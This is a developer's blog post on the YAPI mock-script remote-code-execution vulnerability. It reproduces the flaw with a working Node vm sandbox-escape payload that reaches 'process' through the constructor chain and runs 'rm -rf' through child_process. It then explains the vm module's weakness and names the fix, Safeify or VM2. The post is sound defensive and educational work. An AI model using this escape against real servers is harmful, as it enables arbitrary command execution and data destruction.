Here is the situation: because our project uses YAPI, a few days ago we received an early-warning notice from the security team saying that YAPI had a publicly disclosed security vulnerability, in which a newly registered user can execute arbitrary code on your server and delete anything, so I had to make urgent changes!

I had assumed that such a large open source project (21.7K) would not have such a serious security hole.

I believe many of you have used this open source software as an interface management tool, but in case some of you do not know what this library is, I will briefly introduce it.

YApi (https://github.com/YMFE/yapi) is an efficient, easy-to-use and powerful API management platform, designed to provide more elegant interface management services for developers, product managers and testers. YAPI helps developers create, publish and maintain APIs easily, and it also provides an excellent interactive experience for users. Developers only need the interface data writing tools provided by the platform and a few simple clicks to manage their interfaces.

Not only does it support Docker deployment, but it also has many plugins available, such as automated test plugins, automatic code generation, and more.

Well, moving on: I then followed the security team's reproduction steps to reproduce the YAPI vulnerability.

First I created a file 1.js in my /Users/qiufeng/my/yapi directory.

Then open a project in YAPI — click Settings — and configure the global mock script

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockjson = process.mainModule.require("child_process").execSync("rm -rf /Users/qiufeng/my/yapi/1.js").toString()

Next, request our project's global mock address.

Finally, we found that our 1.js was gone

So I immediately googled for YAPI security vulnerabilities and found that the Internet had exploded, with a lot of victims. Even Dalian University of Technology issued a statement requiring the relevant code to be fixed immediately.

Some victims had cryptominers running on their servers, others had Trojans planted on them.

Then let's look at how to fix this security hole. The project fixed this problem mainly by merging a PR.

The main code change to fix this vulnerability is to replace the Node.js VM module with Safeify.

The original code used the VM module. Here is some background on the VM module; let's take a look at what the Node.js official website says.

The vm module enables compiling and running code within V8 Virtual Machine contexts. The vm module is not a security mechanism. Do not use it to run untrusted code.

In plain terms, it executes JavaScript code dynamically (similar to eval and Function). Of course, the official website also clearly points out the security limitations of the VM module.

Is there any difference from eval and Function? Of course there is. First of all, the biggest problem with eval is that it is intrusive: eval runs inside my current code and scope. The VM provides a more secure sandbox environment.

First, we can use vm.Script to build a Script object: new vm.Script(code[, options]). Its API can be summarized as follows:

  • script.runInThisContext(opts) – Runs the script in the current global scope: the script has access to the global variables of the current script, but not to its local scope.
  • script.runInContext(context, opts) – Runs the script in the provided context, which is the result of vm.createContext. With script.runInContext you can provide a custom, controllable sandbox.
  • script.runInNewContext(sandbox, opts) – Runs the script in the context of a new sandbox; that is, runInNewContext calls vm.createContext for you automatically.

Here is an example:

const vm = require('vm');
vm.runInThisContext(code, opts);
vm.runInNewContext(code, sandbox, opts);
vm.runInContext(code, context, opts);

The VM module implements its sandbox through these optional contexts, isolating the inside of the script from the outside.

So far, then, the VM looks safe. Why did this security breach happen?

The reason is because of the features of JS…

Let's start with a piece of code:

const vm = require('vm');
vm.runInNewContext('this.constructor.constructor("return process")().exit()');

This code looks like a mess, but don't underestimate it: it can make your program exit directly.

Let's go step by step and expand runInNewContext.

const vm = require('vm');

const sandbox = {};
const script = new vm.Script('this.constructor.constructor("return process")().exit()');
const context = vm.createContext(sandbox);

script.runInContext(context);

As we can see, to create a VM environment we first need a sandbox object, which becomes the global context of the script executed in the VM. Inside the VM, this points to the sandbox.

The code above can also be broken down like this:

const vm = require('vm');
const sandbox = {};
const ObjectConstructor = sandbox.constructor;            // reach the Object constructor via the sandbox's prototype chain
const FunctionConstructor = ObjectConstructor.constructor; // Object's own constructor is Function
const foo = FunctionConstructor('return process');         // create a function that returns the global process variable
const process = foo();
process.exit();

Here this refers to the sandbox, a plain object. The constructor of that object is Object, and the constructor of Object is Function. Because the sandbox object was created outside the VM, its prototype chain leads to the outer Object and the outer Function, so the function built from the string is compiled outside the sandbox and can see the real process.

To solve this problem, we can use the safer VM2 or Safeify. Next time we'll look at the source code of these two libraries and how they address the shortcomings of the VM module.

Reference links:

https://segmentfault.com/a/11…

https://github.com/YMFE/yapi/…

Go back and read some of my best articles from the past; you may get even more out of them!

  • 2021 Front-end Learning Path Booklist — The Path to Self-Growth: 570+ likes
  • Discussing front-end watermarking from deciphering a design website (detailed tutorial): 790+ likes
  • This article unlocks the secrets of “file download” layer by layer: 140+ likes
  • 10 cross-domain solutions (with the ultimate tip): 940+ likes

Conclusion

❤️ Follow + like + favorite + comment + share. Writing original content is not easy; please encourage the author to create better articles.

Follow the official account “Qiufeng Notes”, an account focused on front-end interviews, engineering and open source front-end work.